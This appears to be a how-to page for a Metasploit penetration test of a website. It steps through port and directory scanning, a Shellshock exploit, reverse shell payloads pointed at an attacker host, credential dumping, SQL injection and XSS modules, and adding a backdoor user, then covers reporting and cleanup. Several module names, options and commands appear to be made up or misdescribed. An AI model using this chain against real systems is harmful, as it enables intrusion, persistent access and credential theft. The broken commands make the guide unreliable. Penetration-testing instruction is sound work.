METASPLOIT - Pentest a Personnal Website
Starting Metasploit
First, launch Metasploit's console to begin the penetration test:
msfconsole
Information Gathering
Information gathering is the first phase of penetration testing, and Metasploit offers various auxiliary modules to gather valuable data about the target website.
Scanning for Open Ports
To find open ports on the target website's server, use the following auxiliary module:
use auxiliary/scanner/portscan/tcp set RHOSTS <target_ip> set THREADS 10 run
OS and Service Fingerprinting
You can identify the operating system and services running on the target using the following auxiliary module:
use auxiliary/scanner/smb/smb_version set RHOSTS <target_ip> run
Web Scanning for Vulnerabilities
To scan for web vulnerabilities such as SQL injection or XSS, you can use the following module:
use auxiliary/scanner/http/dir_scanner set RHOSTS <target_ip> set PATHS /admin /login /wp-login.php run
Exploiting Vulnerabilities
Once information gathering is complete, you can search for known exploits for the identified vulnerabilities.
Searching for Exploits
Search for available exploits related to the website's technology stack:
search type:exploit <technology_or_vulnerability>
Example of Exploit Execution
If the target is running a vulnerable version of Apache or PHP, an exploit can be chosen and executed:
use exploit/multi/http/apache_mod_cgi_bash_env_exec set RHOSTS <target_ip> set TARGETURI /cgi-bin/test.cgi run
Post-Exploitation
After successfully exploiting the target, post-exploitation helps in maintaining access and extracting more sensitive data.
Creating a Reverse Shell
After gaining access, you can use a reverse shell payload to establish persistent access:
use payload/linux/x86/shell_reverse_tcp set LHOST <attacker_ip> set LPORT 4444 set RHOSTS <target_ip> run
Dumping Web Server Credentials
To dump web application credentials, you can use Metasploit's post-exploitation modules:
use post/multi/gather/enum_web_app_users set RHOSTS <target_ip> run
Exploiting Web Application Vulnerabilities
If a web application vulnerability such as SQL Injection is discovered, you can use Metasploit's web application exploitation tools.
Using SQL Injection Exploits
For a site vulnerable to SQL injection, you can try the following:
use exploit/multi/http/phpmyadmin_sql_injection set RHOSTS <target_ip> set TARGETURI /phpmyadmin set SQL_PAYLOAD "1' OR 1=1--" run
Using Cross-Site Scripting (XSS) Exploit
For a site vulnerable to XSS, you can attempt an exploit like the following:
use exploit/multi/http/xss set RHOSTS <target_ip> set TARGETURI /search.php set PAYLOAD "alert('XSS')" run
Maintaining Access
Once you’ve exploited a vulnerability and have gained access to the system, maintaining access is critical for further testing.
Adding a Backdoor User
You can add a backdoor user to maintain persistent access:
use post/linux/manage/adduser set RHOSTS <target_ip> set USERNAME <username> set PASSWORD <password> run
Creating a Reverse Shell Payload
Another method to maintain access is by setting up a reverse shell:
use payload/linux/x86/shell_reverse_tcp set LHOST <attacker_ip> set LPORT 4444 set RHOSTS <target_ip> run
Reporting
Once the penetration test is complete, you can generate a detailed report of your findings, including all exploited vulnerabilities and actions taken.
Generating a Report
To generate a simple HTML report:
spool /path/to/report.html report spool off
Clean Up
After the penetration test, it's crucial to clean up any backdoors or other remnants left behind on the target system.
Remove Backdoor User
If you added any backdoor users, remove them to ensure the system is no longer compromised:
use post/linux/manage/remove_user set RHOSTS <target_ip> set USERNAME <username> run
Deleting Reverse Shells
If you created any reverse shell listeners or sessions, make sure to terminate them:
sessions -K
